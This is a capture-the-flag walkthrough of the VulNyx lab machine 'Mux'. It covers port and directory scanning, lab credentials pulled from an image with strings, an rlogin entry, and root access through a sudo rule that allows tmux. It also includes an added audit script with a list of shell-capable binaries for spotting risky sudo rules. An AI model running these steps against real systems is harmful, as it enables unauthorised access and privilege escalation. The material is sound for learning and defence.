Information

Mux is a low-difficulty vulnerable Linux virtual machine from the VulNyx platform. It was created by the user d4t4s3c and works correctly on the VirtualBox and VMware hypervisors.


Enumeration

Nmap

TCP

 nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-01 20:04 CEST
Nmap scan report for 192.168.1.80
Host is up (0.00036s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE
80/tcp  open  http
512/tcp open  exec
513/tcp open  login
514/tcp open  shell

 nmap -sVC -p80,512,513,514 192.168.1.80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-01 20:11 CEST
Nmap scan report for 192.168.1.80
Host is up (0.00073s latency).

PORT    STATE SERVICE    VERSION
80/tcp  open  http       Apache httpd 2.4.56 ((Debian))
|_http-title: Monna Lisa
|_http-server-header: Apache/2.4.56 (Debian)
512/tcp open  exec       netkit-rsh rexecd
513/tcp open  login?
514/tcp open  tcpwrapped

Shell (lisa)

80/TCP (HTTP)

Site

Directory Brute Force

 gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.80/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.80/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 277]
Progress: 220546 / 220547 (100.00%)
===============================================================
Finished
===============================================================

Stego

I download the image, analyze its metadata with strings, and find a set of credentials.

 wget -q "http://192.168.1.80/image.jpg"
 strings image.jpg -n 10
"x|+;"Lj2!4
^kD<;4dQeDGa
(bEFo0(gs|
1U:HAvm,n	
#zAShuj7`1
4phV1&Qcd_
|"sBI,g# k([B
S^W9,S#6]K
{aidWDq#&bf
2fNPJ]H6Wn
QW>k0V:}GO}
<M) VOT}W'
b	#+ rI-eGn
#p~-gl_;,a	
UGr3RWgM,2
E[t7Clce|`6
lisa:Gi0c0nd@

513/TCP (RLOGIN)

I log in to the system as the user lisa with the credentials obtained.

# apt install -y rsh-redone-client
 rlogin 192.168.1.80 -l lisa
Password: 
lisa@mux:~$ id ; hostname
uid=1000(lisa) gid=1000(lisa) grupos=1000(lisa)
mux

Privilege Escalation

Enumeration

Sudo

The user lisa can run the tmux binary as root with sudo.

lisa@mux:~$ sudo -l
Matching Defaults entries for lisa on mux:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lisa may run the following commands on mux:
    (root) NOPASSWD: /usr/bin/tmux

Abuse

I become root by abusing this privilege: tmux started through sudo opens its shell as root.

lisa@mux:~$ sudo -u root /usr/bin/tmux
root@mux:/home/lisa# id ; hostname
uid=0(root) gid=0(root) grupos=0(root)
mux
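
The same sudo -l output can be checked from the administrator's side. The following is an added example, not part of the original write-up: it reads sudo -l output and reports rules that grant ALL or a program able to start a shell. The SHELL_CAPABLE list, the function names and the second sample rule are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: flag sudo rules that grant a shell-capable program.
# SHELL_CAPABLE is an assumed, non-exhaustive list chosen for illustration.
SHELL_CAPABLE="tmux screen vi vim nano less more man find awk env sh bash"

# Constructed sample: the `sudo -l` rule shown above plus one invented
# benign rule (systemctl status) for contrast.
sample_sudo_l() {
cat <<'EOF'
User lisa may run the following commands on mux:
    (root) NOPASSWD: /usr/bin/tmux
    (root) /usr/bin/systemctl status apache2
EOF
}

# Reads `sudo -l` output on stdin and prints "<runas> <PASSWD|NOPASSWD> <cmd>"
# for every rule whose command is ALL or a program from SHELL_CAPABLE.
# Only tags at the start of a rule (NOPASSWD:, SETENV:, ...) are handled.
audit_sudo_rules() {
    awk -v list="$SHELL_CAPABLE" '
    BEGIN { n = split(list, a, " "); for (i = 1; i <= n; i++) risky[a[i]] = 1 }
    /^[ \t]*\(/ {                                  # rule lines start with "(runas)"
        line = $0; sub(/^[ \t]*/, "", line)
        runas = line; sub(/\).*/, ")", runas)
        rest = line;  sub(/^\([^)]*\)[ \t]*/, "", rest)
        tag = "PASSWD"
        while (match(rest, /^[A-Z_]+:[ \t]*/)) {   # strip leading tags
            if (substr(rest, 1, RLENGTH) ~ /^NOPASSWD:/) tag = "NOPASSWD"
            rest = substr(rest, RLENGTH + 1)
        }
        m = split(rest, cmds, /,[ \t]*/)           # a rule may list several commands
        for (j = 1; j <= m; j++) {
            split(cmds[j], w, " ")                 # w[1] is the program path
            k = split(w[1], p, "/")                # p[k] is its basename
            if (cmds[j] == "ALL" || (p[k] in risky)) print runas, tag, cmds[j]
        }
    }'
}

sample_sudo_l | audit_sudo_rules   # prints: (root) NOPASSWD /usr/bin/tmux
```

On a live host the function can be fed with sudo -l -U <user> run by an administrator for each account under review.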

Flags

Now as root I can read the user.txt and root.txt flags.

root@mux:/home/lisa# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
bcb44***************************
be203***************************

That concludes the walkthrough of the Mux machine.

Happy Hacking!